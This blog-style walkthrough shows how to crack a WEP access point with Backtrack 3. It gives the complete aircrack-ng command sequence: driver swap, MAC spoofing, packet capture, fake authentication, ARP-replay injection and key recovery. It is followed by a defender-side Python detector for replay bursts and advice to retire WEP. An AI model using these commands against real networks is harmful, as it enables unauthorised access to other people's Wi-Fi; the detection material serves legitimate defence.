Breaking WEP using Backtrack 3

I had a bet with a friend of mine (for a case of beer) that I could crack a fake WEP encrypted access point in under 5 minutes using my rather old Packard Bell Easynote Skype Edition.

There are a few things to note: I used an old WEP-only router that I was about to dump. I never saw the password and couldn’t ask for hints. I also found out that my piece of shit laptop can’t be booted from a DVD, hence I had to use Backtrack 3 instead of Backtrack 5.

With Backtrack 3 downloaded, burnt to disc, booted up and a shell opened:

The drivers loaded automagically are the wrong ones. If you have the Easynote Skype Edition, you’ll notice this because the WiFi light on the WiFi button fails to come on.

Unload the wireless drivers

modprobe -r iwl3945

Load in the correct drivers

modprobe ipwraw

Stop the Wireless card

airmon-ng stop wifi0
ifconfig wifi0 down

Change the MAC address

macchanger --mac 00:11:22:33:44:55 wifi0

Start up airmon-ng to monitor the APs in the area

airmon-ng wifi0

After finding the access point and noting its BSSID and channel:

airodump-ng -c CHANNEL_NUMBER -w FILE.OUT --bssid BSSID_HERE wifi0

Open up a new terminal, leaving airodump to run in Terminal 1.

Inject some fake packets on Terminal 2

aireplay-ng -1 0 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0

Airodump’s #Data column should start filling up. When it gets to about 100, kill the injection.

In Terminal 2, we’ll replay the packets we faked earlier

aireplay-ng -3 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0

You should now see #Data shoot up! Leave it running until #Data reaches about 50k. Close Terminal 2 and kill airodump in Terminal 1.

aircrack-ng -b BSSID_HERE FILE.OUT.cap

After about 15 seconds, you should have the wireless password.
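Seen from the other side of the air, the #Data surge this walkthrough relies on is one captured frame being re-sent at hundreds of frames per second, which a wireless IDS can pick out easily. The detector below is an added, defender-side illustration and is not from the original post: the frame records are constructed (the post's spoofed MAC reused as the replaying station) and the rate and size-variance thresholds are assumptions.

```python
from collections import defaultdict
from statistics import pstdev

# Constructed sample capture summary (not from the original post): one record per
# 802.11 data frame as (timestamp_s, source_mac, bssid, frame_len_bytes).
SAMPLE_FRAMES = (
    # ordinary client: ~2 frames/s with varied sizes
    [(i * 0.50, "aa:bb:cc:00:00:01", "de:ad:be:ef:00:01", 90 + (i % 7) * 10)
     for i in range(20)]
    # replay burst: 500 frames/s, every frame exactly 68 bytes (a replayed ARP request)
    + [(5.0 + i * 0.002, "00:11:22:33:44:55", "de:ad:be:ef:00:01", 68)
       for i in range(400)]
)


def arp_replay_suspects(frames, window_s=1.0, min_rate=200, max_len_stdev=2.0):
    """Return {source_mac: peak_frames_per_window} for stations whose data-frame
    rate in any window_s-second window reaches min_rate AND whose frame sizes
    barely vary. Real clients produce mixed sizes at modest rates; a replay tool
    re-sends the same frame at hundreds of frames per second. Thresholds are
    assumed values for this example, not tuned production numbers."""
    by_src = defaultdict(list)
    for ts, src, _bssid, length in frames:
        by_src[src].append((ts, length))

    suspects = {}
    for src, recs in by_src.items():
        recs.sort()                      # order by timestamp
        lo, peak = 0, 0
        for hi in range(len(recs)):      # sliding window over timestamps
            while recs[hi][0] - recs[lo][0] > window_s:
                lo += 1
            peak = max(peak, hi - lo + 1)
        lengths = [length for _ts, length in recs]
        if peak >= min_rate and pstdev(lengths) <= max_len_stdev:
            suspects[src] = peak
    return suspects


if __name__ == "__main__":
    for mac, rate in arp_replay_suspects(SAMPLE_FRAMES).items():
        print(f"replay suspect {mac}: {rate} identical-size frames in 1 s")
```

The only real fix is the one the post's premise implies: WEP should not be deployed at all, and a detection like this just tells you when someone is collecting IVs from a network that still has it.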